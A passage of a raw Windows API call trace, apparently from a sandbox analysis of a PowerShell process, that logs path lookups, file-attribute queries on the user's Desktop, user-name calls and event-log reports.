lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.855] GetLastError () returned 0xcb [0044.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25df04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0044.855] GetLastError () returned 0xcb [0044.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0044.855] GetLastError () returned 0xcb [0044.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0044.855] GetLastError () returned 0xcb [0044.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0044.856] GetLastError () returned 0xcb [0044.882] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.882] GetLastError () returned 0x3 [0044.882] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.883] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33404fc*="Certificate", lpRawData=0x33403b8) returned 1 [0044.883] GetLastError () returned 0x0 [0044.890] GetLogicalDrives () returned 0x4 [0044.890] GetLastError () returned 0xcb [0044.890] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25e07c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.890] GetLastError () returned 0xcb [0044.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.890] GetLastError () returned 0xcb [0044.890] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x54e2a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.890] GetLastError () returned 0xcb [0044.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.896] GetLastError () returned 0xcb [0044.896] SetErrorMode (uMode=0x1) returned 0x1 [0044.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x3347e68 | out: lpFileInformation=0x3347e68*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.896] GetLastError () returned 0xcb [0044.896] SetErrorMode (uMode=0x1) returned 0x1 [0044.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25decc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.896] GetLastError () returned 0xcb [0044.896] SetErrorMode (uMode=0x1) returned 0x1 [0044.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x334801c | out: lpFileInformation=0x334801c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.896] GetLastError () returned 0xcb [0044.896] SetErrorMode (uMode=0x1) returned 0x1 [0044.897] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25e014, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.897] GetLastError () returned 0xcb [0044.897] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.897] GetLastError () returned 0xcb [0044.897] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfa4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.898] GetLastError () returned 0xcb [0044.898] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.898] GetLastError () returned 0xcb [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25dfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.898] GetLastError () returned 0xcb [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x25df40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.898] GetLastError () returned 0xcb [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.898] GetLastError () returned 0xcb [0044.898] SetErrorMode (uMode=0x1) returned 0x1 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25dfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.899] GetLastError () returned 0xcb [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x25df40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.899] GetLastError () returned 0xcb [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e410 | out: lpFileInformation=0x25e410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.899] GetLastError () returned 0xcb [0044.899] SetErrorMode (uMode=0x1) returned 0x1 [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25dfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.899] GetLastError () returned 0xcb [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x25df40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.899] GetLastError () returned 0xcb [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e41c | out: lpFileInformation=0x25e41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e41c | out: lpFileInformation=0x25e41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.900] GetLastError () returned 0xcb [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x25df4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0044.900] GetLastError () returned 0xcb [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x25e41c | out: lpFileInformation=0x25e41c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x25e41c | out: lpFileInformation=0x25e41c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.900] GetLastError () returned 0xcb [0044.900] SetErrorMode (uMode=0x1) returned 0x1 [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.900] GetLastError () returned 0xcb [0044.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x25df4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.901] GetLastError () returned 0xcb [0044.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.901] GetLastError () returned 0xcb [0044.901] SetErrorMode (uMode=0x1) returned 0x1 [0044.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e41c | out: lpFileInformation=0x25e41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.901] GetLastError () returned 0xcb [0044.901] SetErrorMode (uMode=0x1) returned 0x1 [0044.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.901] GetLastError () returned 0xcb [0044.901] SetErrorMode (uMode=0x1) returned 0x1 [0044.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e41c | out: lpFileInformation=0x25e41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.901] GetLastError () returned 0xcb [0044.901] SetErrorMode (uMode=0x1) returned 0x1 [0044.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.901] GetLastError () returned 0xcb [0044.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x25df4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.901] GetLastError () returned 0xcb [0044.902] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x25e06c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0044.902] GetLastError () returned 0xcb [0044.902] SetErrorMode (uMode=0x1) returned 0x1 [0044.902] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x33528d8 | out: lpFileInformation=0x33528d8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6afe5de0, ftLastAccessTime.dwHighDateTime=0x1d31a96, ftLastWriteTime.dwLowDateTime=0x6afe5de0, ftLastWriteTime.dwHighDateTime=0x1d31a96, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.902] GetLastError () returned 0xcb [0044.902] SetErrorMode (uMode=0x1) returned 0x1 [0044.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.903] GetLastError () returned 0xcb [0044.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.903] GetLastError () returned 0xcb [0044.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.903] GetLastError () returned 0xcb [0044.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.903] GetLastError () returned 0xcb [0044.914] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e608) returned 0x1 [0044.915] GetLastError () returned 0xcb [0044.915] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e610 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e610) returned 1 [0044.916] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x336a988*="Available", lpRawData=0x336a844) returned 1 [0044.916] GetLastError () returned 0x0 [0044.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.916] GetLastError () returned 0xcb [0044.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.916] 